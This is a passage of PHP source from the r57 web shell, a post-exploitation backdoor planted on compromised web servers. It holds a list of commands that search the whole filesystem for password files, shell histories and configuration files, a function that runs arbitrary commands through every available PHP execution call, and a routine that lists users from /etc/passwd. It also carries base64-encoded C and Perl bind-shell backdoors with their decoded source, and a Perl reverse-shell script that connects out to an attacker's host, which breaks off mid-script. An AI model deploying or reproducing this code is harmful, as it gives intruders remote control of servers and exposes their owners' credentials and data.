'find sgid files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type f -perm -02000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
2245
2246
'find all writable files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
2247
2248
'find all writable files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type f -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
2249
2250
'find all writable directories >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /  -type d -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
2251
2252
'find all writable directories in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type d -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
2253
2254
'find all writable directories and files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
2255
2256
'find all writable directories and files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
2257
2258
'find all .htpasswd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .htpasswd  >> /tmp/grep.txt;cat /tmp/grep.txt',
2259
2260
'find all .bash_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .bash_history  >> /tmp/grep.txt;cat /tmp/grep.txt',
2261
2262
'find all .mysql_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .mysql_history  >> /tmp/grep.txt;cat /tmp/grep.txt',
2263
2264
'find all .fetchmailrc files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .fetchmailrc  >> /tmp/grep.txt;cat /tmp/grep.txt',
2265
2266
'find httpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name httpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
2267
2268
'find vhosts.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name vhosts.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
2269
2270
'find proftpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name proftpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
2271
2272
'find admin.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name admin.php >> /tmp/grep.txt;cat /tmp/grep.txt',
2273
2274
'find config* files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "config*"  >> /tmp/grep.txt;cat /tmp/grep.txt',
2275
2276
'find cfg.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name cfg.php >> /tmp/grep.txt;cat /tmp/grep.txt',
2277
2278
'find conf.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name conf.php >> /tmp/grep.txt;cat /tmp/grep.txt',
2279
2280
'find config.dat files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.dat >> /tmp/grep.txt;cat /tmp/grep.txt',
2281
2282
'find config.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.php >> /tmp/grep.txt;cat /tmp/grep.txt',
2283
2284
'find config.inc files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.inc >> /tmp/grep.txt;cat /tmp/grep.txt',
2285
2286
'find config.inc.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.inc.php >> /tmp/grep.txt;cat /tmp/grep.txt',
2287
2288
'find config.default.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.default.php >> /tmp/grep.txt;cat /tmp/grep.txt',
2289
2290
'find *.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*.conf" >> /tmp/grep.txt;cat /tmp/grep.txt',
2291
2292
'find *.pwd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*.pwd" >> /tmp/grep.txt;cat /tmp/grep.txt',
2293
2294
'find *.sql files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*.sql" >> /tmp/grep.txt;cat /tmp/grep.txt',
2295
2296
'find *backup* files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*backup*" >> /tmp/grep.txt;cat /tmp/grep.txt',
2297
2298
'find *dump* files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*dump*" >> /tmp/grep.txt;cat /tmp/grep.txt',
2299
2300
'-----------------------------------'=>'',
2301
2302
'find /var/ access_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name access_log >> /tmp/grep.txt;cat /tmp/grep.txt',
2303
2304
'find /var/ error_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name error_log >> /tmp/grep.txt;cat /tmp/grep.txt',
2305
2306
'find /var/ access.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name access.log >> /tmp/grep.txt;cat /tmp/grep.txt',
2307
2308
'find /var/ error.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name error.log >> /tmp/grep.txt;cat /tmp/grep.txt',
2309
2310
'find /var/ "*.log" files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name "*.log" >> /tmp/grep.txt;cat /tmp/grep.txt',
2311
2312
'----------------------------------------------------------------------------------------------------'=>'ls -la'
2313
2314
);
2315
2316
$table_up1  = "<tr><td bgcolor=#333333><font face=Verdana size=-2><b><div align=center>:: ";
2317
2318
$table_up2  = " ::</div></b></font></td></tr><tr><td>";
2319
2320
$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333>";
2321
2322
$table_end1 = "</td></tr>";
2323
2324
$arrow = " <font face=Webdings color=gray>4</font>";
2325
2326
$lb = "<font color=green>[</font>";
2327
2328
$rb = "<font color=green>]</font>";
2329
2330
$font = "<font face=Verdana size=-2>";
2331
2332
$ts = "<table class=table1 width=100% align=center>";
2333
2334
$te = "</table>";
2335
2336
$fs = "<form name=form method=POST>";
2337
2338
$fe = "</form>";
2339
2340
if(isset($_GET['users'])) 
2341
2342
{
2343
2344
if(!$users=get_users('/etc/passwd')) {echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>";}
2345
2346
else 
2347
2348
{
2349
2350
echo '<center>';
2351
2352
foreach($users as $user) {echo $user."<br>";}
2353
2354
echo '</center>';
2355
2356
}
2357
2358
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";die();
2359
2360
}
2361
2362
if (!empty($_POST['dir'])) {if(@function_exists('chdir')){@chdir($_POST['dir']);}else if(@function_exists('chroot')){@chroot($_POST['dir']);};}
2363
2364
if (empty($_POST['dir'])){if(@function_exists('chdir')){$dir = @getcwd();};}else{$dir=$_POST['dir'];}
2365
2366
$unix = 0;
2367
2368
if(strlen($dir)>1 &&$dir[1]==":") $unix=0;else $unix=1;
2369
2370
if(empty($dir))
2371
2372
{
2373
2374
$os = getenv('OS');
2375
2376
if(empty($os)){$os = @php_uname();}
2377
2378
if(empty($os)){$os ="-";$unix=1;}
2379
2380
else
2381
2382
{
2383
2384
if(@eregi("^win",$os)) {$unix = 0;}
2385
2386
else {$unix = 1;}
2387
2388
}
2389
2390
}
2391
2392
if(!empty($_POST['s_dir']) &&!empty($_POST['s_text']) &&!empty($_POST['cmd']) &&$_POST['cmd'] == "search_text")
2393
2394
{
2395
2396
echo $head;
2397
2398
if(!empty($_POST['s_mask']) &&!empty($_POST['m'])) {$sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']);}
2399
2400
else {$sr = new SearchResult($_POST['s_dir'],$_POST['s_text']);}
2401
2402
$sr->SearchText(0,0);
2403
2404
$res = $sr->GetResultFiles();
2405
2406
$found = $sr->GetMatchesCount();
2407
2408
$titles = $sr->GetTitles();
2409
2410
$r = "";
2411
2412
if($found >0)
2413
2414
{
2415
2416
$r .= "<TABLE width=100%>";
2417
2418
foreach($res as $file=>$v)
2419
2420
{
2421
2422
$r .= "<TR>";
2423
2424
$r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
2425
2426
$r .= (!$unix)?str_replace("/","\\",$file) : $file;
2427
2428
$r .= "</b></font></ TD>";
2429
2430
$r .= "</TR>";
2431
2432
foreach($v as $a=>$b)
2433
2434
{
2435
2436
$r .= "<TR>";
2437
2438
$r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
2439
2440
$r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
2441
2442
$r .= "</TR>\n";
2443
2444
}
2445
2446
}
2447
2448
$r .= "</TABLE>";
2449
2450
echo $r;
2451
2452
}
2453
2454
else
2455
2456
{
2457
2458
echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
2459
2460
}
2461
2462
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
2463
2464
die();
2465
2466
}
2467
2468
if(!$safe_mode &&strpos(ex("echo abcr57"),"r57")!=3) {$safe_mode = 1;}
2469
2470
$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
2471
2472
if(empty($SERVER_SOFTWARE)){$SERVER_SOFTWARE = "-";}
2473
2474
function ws($i)
2475
2476
{
2477
2478
return @str_repeat("&nbsp;",$i);
2479
2480
}
2481
2482
function ex($cfe)
2483
2484
{
2485
2486
$res = '';
2487
2488
if (!empty($cfe))
2489
2490
{
2491
2492
if(@function_exists('exec'))
2493
2494
{
2495
2496
@exec($cfe,$res);
2497
2498
$res = join("\n",$res);
2499
2500
}
2501
2502
elseif(@function_exists('shell_exec'))
2503
2504
{
2505
2506
$res = @shell_exec($cfe);
2507
2508
}
2509
2510
elseif(@function_exists('system'))
2511
2512
{
2513
2514
@ob_start();
2515
2516
@system($cfe);
2517
2518
$res = @ob_get_contents();
2519
2520
@ob_end_clean();
2521
2522
}
2523
2524
elseif(@function_exists('passthru'))
2525
2526
{
2527
2528
@ob_start();
2529
2530
@passthru($cfe);
2531
2532
$res = @ob_get_contents();
2533
2534
@ob_end_clean();
2535
2536
}
2537
2538
elseif(@is_resource($f = @popen($cfe,"r")))
2539
2540
{
2541
2542
$res = "";
2543
2544
if(@function_exists('fread') &&@function_exists('feof')){
2545
2546
while(!@feof($f)) {$res .= @fread($f,1024);}
2547
2548
}else if(@function_exists('fgets') &&@function_exists('feof')){
2549
2550
while(!@feof($f)) {$res .= @fgets($f,1024);}
2551
2552
}
2553
2554
@pclose($f);
2555
2556
}
2557
2558
elseif(@is_resource($f = @proc_open($cfe,array(1 =>array("pipe","w")),$pipes)))
2559
2560
{
2561
2562
$res = "";
2563
2564
if(@function_exists('fread') &&@function_exists('feof')){
2565
2566
while(!@feof($pipes[1])) {$res .= @fread($pipes[1],1024);}
2567
2568
}else if(@function_exists('fgets') &&@function_exists('feof')){
2569
2570
while(!@feof($pipes[1])) {$res .= @fgets($pipes[1],1024);}
2571
2572
}
2573
2574
@proc_close($f);
2575
2576
}
2577
2578
elseif(@function_exists('pcntl_exec')&&@function_exists('pcntl_fork'))
2579
2580
{
2581
2582
$res = '[~] Blind Command Execution via [pcntl_exec]\n\n';
2583
2584
$pid = @pcntl_fork();
2585
2586
if ($pid == -1) {
2587
2588
$res .= '[-] Could not children fork. Exit';
2589
2590
}else if ($pid) {
2591
2592
if (@pcntl_wifexited($status)){$res .= '[+] Done! Command "'.$cfe.'" successfully executed.';}
2593
2594
else {$res .= '[-] Error. Command incorrect.';}
2595
2596
}else {
2597
2598
$cfe = array(" -e 'system(\"$cfe\")'");
2599
2600
if(@pcntl_exec('/usr/bin/perl',$cfe)) exit(0);
2601
2602
if(@pcntl_exec('/usr/local/bin/perl',$cfe)) exit(0);
2603
2604
die();
2605
2606
}
2607
2608
}
2609
2610
}
2611
2612
return $res;
2613
2614
}
2615
2616
function get_users($filename)
2617
2618
{
2619
2620
$users = array();
2621
2622
$rows=@explode("\n",readzlib($filename));
2623
2624
if(!$rows) return 0;
2625
2626
foreach ($rows as $string)
2627
2628
{
2629
2630
$user = @explode(":",trim($string));
2631
2632
if(substr($string,0,1)!='#') array_push($users,$user[0]);
2633
2634
}
2635
2636
return $users;
2637
2638
}
2639
2640
function err($n,$txt='')
2641
2642
{
2643
2644
echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>';
2645
2646
echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
2647
2648
if(!empty($txt)) {echo " $txt";}
2649
2650
echo '</b></div></font></td></tr></table>';
2651
2652
return null;
2653
2654
}
2655
2656
function perms($mode)
2657
2658
{
2659
2660
if (!$GLOBALS['unix']) return 0;
2661
2662
if( $mode &0x1000 ) {$type='p';}
2663
2664
else if( $mode &0x2000 ) {$type='c';}
2665
2666
else if( $mode &0x4000 ) {$type='d';}
2667
2668
else if( $mode &0x6000 ) {$type='b';}
2669
2670
else if( $mode &0x8000 ) {$type='-';}
2671
2672
else if( $mode &0xA000 ) {$type='l';}
2673
2674
else if( $mode &0xC000 ) {$type='s';}
2675
2676
else $type='u';
2677
2678
$owner["read"] = ($mode &00400) ?'r': '-';
2679
2680
$owner["write"] = ($mode &00200) ?'w': '-';
2681
2682
$owner["execute"] = ($mode &00100) ?'x': '-';
2683
2684
$group["read"] = ($mode &00040) ?'r': '-';
2685
2686
$group["write"] = ($mode &00020) ?'w': '-';
2687
2688
$group["execute"] = ($mode &00010) ?'x': '-';
2689
2690
$world["read"] = ($mode &00004) ?'r': '-';
2691
2692
$world["write"] = ($mode &00002) ?'w': '-';
2693
2694
$world["execute"] = ($mode &00001) ?'x': '-';
2695
2696
if( $mode &0x800 ) $owner["execute"] = ($owner['execute']=='x') ?'s': 'S';
2697
2698
if( $mode &0x400 ) $group["execute"] = ($group['execute']=='x') ?'s': 'S';
2699
2700
if( $mode &0x200 ) $world["execute"] = ($world['execute']=='x') ?'t': 'T';
2701
2702
$s=sprintf("%1s",$type);
2703
2704
$s.=sprintf("%1s%1s%1s",$owner['read'],$owner['write'],$owner['execute']);
2705
2706
$s.=sprintf("%1s%1s%1s",$group['read'],$group['write'],$group['execute']);
2707
2708
$s.=sprintf("%1s%1s%1s",$world['read'],$world['write'],$world['execute']);
2709
2710
return trim($s);
2711
2712
}
2713
2714
function in($type,$name,$size,$value,$checked=0)
2715
2716
{
2717
2718
$ret = "<input type=".$type." name=".$name." ";
2719
2720
if($size != 0) {$ret .= "size=".$size." ";}
2721
2722
$ret .= "value=\"".$value."\"";
2723
2724
if($checked) $ret .= " checked";
2725
2726
return $ret.">";
2727
2728
}
2729
2730
function which($pr)
2731
2732
{
2733
2734
$path = '';
2735
2736
$path = ex("which $pr");
2737
2738
if(!empty($path)) {return $path;}else {return false;}
2739
2740
}
2741
2742
function cf($fname,$text)
2743
2744
{
2745
2746
$w_file=@fopen($fname,"w") or @function_exists('file_put_contents') or err(0);
2747
2748
if($w_file)
2749
2750
{
2751
2752
@fwrite($w_file,@base64_decode($text)) or @fputs($w_file,@base64_decode($text)) or @file_put_contents($fname,@base64_decode($text));
2753
2754
@fclose($w_file);
2755
2756
}
2757
2758
}
2759
2760
function sr($l,$t1,$t2)
2761
2762
{
2763
2764
return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
2765
2766
}
2767
2768
if (!@function_exists("view_size"))
2769
2770
{
2771
2772
function view_size($size)
2773
2774
{
2775
2776
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 ." GB";}
2777
2778
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 ." MB";}
2779
2780
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 ." KB";}
2781
2782
else {$size = $size ." B";}
2783
2784
return $size;
2785
2786
}
2787
2788
}
2789
2790
function DirFilesR($dir,$types='')
2791
2792
{
2793
2794
$files = Array();
2795
2796
if(($handle = @opendir($dir)) ||(@function_exists('scandir')))
2797
2798
{
2799
2800
while ((false !== ($file = @readdir($handle))) &&(false !== ($file = @scandir($dir))))
2801
2802
{
2803
2804
if ($file != "."&&$file != "..")
2805
2806
{
2807
2808
if(@is_dir($dir."/".$file))
2809
2810
$files = @array_merge($files,DirFilesR($dir."/".$file,$types));
2811
2812
else
2813
2814
{
2815
2816
$pos = @strrpos($file,".");
2817
2818
$ext = @substr($file,$pos,@strlen($file)-$pos);
2819
2820
if($types)
2821
2822
{
2823
2824
if(@in_array($ext,explode(';',$types)))
2825
2826
$files[] = $dir."/".$file;
2827
2828
}
2829
2830
else
2831
2832
$files[] = $dir."/".$file;
2833
2834
}
2835
2836
}
2837
2838
}
2839
2840
@closedir($handle);
2841
2842
}
2843
2844
return $files;
2845
2846
}
2847
2848
class SearchResult
2849
2850
{
2851
2852
var $text;
2853
2854
var $FilesToSearch;
2855
2856
var $ResultFiles;
2857
2858
var $FilesTotal;
2859
2860
var $MatchesCount;
2861
2862
var $FileMatschesCount;
2863
2864
var $TimeStart;
2865
2866
var $TimeTotal;
2867
2868
var $titles;
2869
2870
function SearchResult($dir,$text,$filter='')
2871
2872
{
2873
2874
$dirs = @explode(";",$dir);
2875
2876
$this->FilesToSearch = Array();
2877
2878
for($a=0;$a<count($dirs);$a++)
2879
2880
$this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
2881
2882
$this->text = $text;
2883
2884
$this->FilesTotal = @count($this->FilesToSearch);
2885
2886
$this->TimeStart = getmicrotime();
2887
2888
$this->MatchesCount = 0;
2889
2890
$this->ResultFiles = Array();
2891
2892
$this->FileMatchesCount = Array();
2893
2894
$this->titles = Array();
2895
2896
}
2897
2898
function GetFilesTotal() {return $this->FilesTotal;}
2899
2900
function GetTitles() {return $this->titles;}
2901
2902
function GetTimeTotal() {return $this->TimeTotal;}
2903
2904
function GetMatchesCount() {return $this->MatchesCount;}
2905
2906
function GetFileMatchesCount() {return $this->FileMatchesCount;}
2907
2908
function GetResultFiles() {return $this->ResultFiles;}
2909
2910
function SearchText($phrase=0,$case=0) {
2911
2912
$qq = @explode(' ',$this->text);
2913
2914
$delim = '|';
2915
2916
if($phrase)
2917
2918
foreach($qq as $k=>$v)
2919
2920
$qq[$k] = '\b'.$v.'\b';
2921
2922
$words = '('.@implode($delim,$qq).')';
2923
2924
$pattern = "/".$words."/";
2925
2926
if(!$case)
2927
2928
$pattern .= 'i';
2929
2930
foreach($this->FilesToSearch as $k=>$filename)
2931
2932
{
2933
2934
$this->FileMatchesCount[$filename] = 0;
2935
2936
$FileStrings = @file($filename) or @next;
2937
2938
for($a=0;$a<@count($FileStrings);$a++)
2939
2940
{
2941
2942
$count = 0;
2943
2944
$CurString = $FileStrings[$a];
2945
2946
$CurString = @Trim($CurString);
2947
2948
$CurString = @strip_tags($CurString);
2949
2950
$aa = '';
2951
2952
if(($count = @preg_match_all($pattern,$CurString,$aa)))
2953
2954
{
2955
2956
$CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
2957
2958
$this->ResultFiles[$filename][$a+1] = $CurString;
2959
2960
$this->MatchesCount += $count;
2961
2962
$this->FileMatchesCount[$filename] += $count;
2963
2964
}
2965
2966
}
2967
2968
}
2969
2970
$this->TimeTotal = @round(getmicrotime() -$this->TimeStart,4);
2971
2972
}
2973
2974
}
2975
2976
function getmicrotime()
2977
2978
{
2979
2980
list($usec,$sec) = @explode(" ",@microtime());
2981
2982
return ((float)$usec +(float)$sec);
2983
2984
}
2985
2986
$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
2987
2988
A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
2989
2990
GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
2991
2992
b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
2993
2994
pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
2995
2996
NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
2997
2998
ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
2999
3000
ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
3001
3002
7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
3003
3004
9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
3005
3006
2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
3007
3008
dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
3009
3010
lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
3011
3012
/* ?ST SATIRIN KIRILMI? HAL? */
3013
3014
/*
3015
3016
3017
3018
#include <stdio.h>
3019
3020
#include <string.h>
3021
3022
#include <sys/types.h>
3023
3024
#include <sys/socket.h>
3025
3026
#include <netinet/in.h>
3027
3028
#include <errno.h>
3029
3030
int main(argc,argv)
3031
3032
int argc;
3033
3034
char **argv;
3035
3036
{  
3037
3038
 int sockfd, newfd;
3039
3040
 char buf[30];
3041
3042
 struct sockaddr_in remote;
3043
3044
 if(fork() == 0) { 
3045
3046
 remote.sin_family = AF_INET;
3047
3048
 remote.sin_port = htons(atoi(argv[1]));
3049
3050
 remote.sin_addr.s_addr = htonl(INADDR_ANY); 
3051
3052
 sockfd = socket(AF_INET,SOCK_STREAM,0);
3053
3054
 if(!sockfd) perror("socket error");
3055
3056
 bind(sockfd, (struct sockaddr *)&remote, 0x10);
3057
3058
 listen(sockfd, 5);
3059
3060
 while(1)
3061
3062
  {
3063
3064
   newfd=accept(sockfd,0,0);
3065
3066
   dup2(newfd,0);
3067
3068
   dup2(newfd,1);
3069
3070
   dup2(newfd,2);
3071
3072
   write(newfd,"Password:",10);
3073
3074
   read(newfd,buf,sizeof(buf));
3075
3076
   if (!chpass(argv[2],buf))
3077
3078
   system("echo welcome to r57 shell && /bin/bash -i");
3079
3080
   else
3081
3082
   fprintf(stderr,"Sorry");
3083
3084
   close(newfd);
3085
3086
  }
3087
3088
 }
3089
3090
}
3091
3092
int chpass(char *base, char *entered) {
3093
3094
int i;
3095
3096
for(i=0;i<strlen(entered);i++) 
3097
3098
{
3099
3100
if(entered[i] == '\n')
3101
3102
entered[i] = '\0'; 
3103
3104
if(entered[i] == '\r')
3105
3106
entered[i] = '\0';
3107
3108
}
3109
3110
if (!strcmp(base,entered))
3111
3112
return 0;
3113
3114
}
3115
3116
3117
3118
*/
3119
3120
3121
3122
$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
3123
3124
VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
3125
3126
JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
3127
3128
TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
3129
3130
lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
3131
3132
Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
3133
3134
Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
3135
3136
lIENPTk47DQpleGl0IDA7DQp9DQp9";
3137
3138
3139
3140
/* ?ST SATIRIN KIRILMI? HAL? */
3141
3142
/*
3143
3144
3145
3146
#!/usr/bin/perl
3147
3148
$SHELL="/bin/bash -i";
3149
3150
if (@ARGV < 1) { exit(1); }
3151
3152
$LISTEN_PORT=$ARGV[0];
3153
3154
use Socket;
3155
3156
$protocol=getprotobyname('tcp');
3157
3158
socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die "Cant create socket\n";
3159
3160
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
3161
3162
bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || die "Cant open port\n";
3163
3164
listen(S,3) || die "Cant listen port\n";
3165
3166
while(1)
3167
3168
{
3169
3170
accept(CONN,S);
3171
3172
if(!($pid=fork))
3173
3174
{
3175
3176
die "Cannot fork" if (!defined $pid);
3177
3178
open STDIN,"<&CONN";
3179
3180
open STDOUT,">&CONN";
3181
3182
open STDERR,">&CONN";
3183
3184
exec $SHELL || die print CONN "Cant execute $SHELL\n";
3185
3186
close CONN;
3187
3188
exit 0;
3189
3190
}
3191
3192
}
3193
3194
3195
3196
*/
3197
3198
3199
3200
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
3201
3202
aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
3203
3204
hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
3205
3206
sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
3207
3208
kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
3209
3210
KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
3211
3212
OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
3213
3214
3215
3216
/* ?ST SATIRIN KIRILMI? HAL? */
3217
3218
/*
3219
3220
3221
3222
#!/usr/bin/perl
3223
3224
use Socket;
3225
3226
$cmd= "lynx";
3227
3228
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
3229
3230
$0=$cmd;
3231
3232
$target=$ARGV[0];
3233
3234
$port=$ARGV[1];
3235
3236
$iaddr=inet_aton($target) || die("Error: $!\n");
3237
3238
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
3239
3240
$proto=getprotobyname('tcp');
3241
3242
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
3243
3244
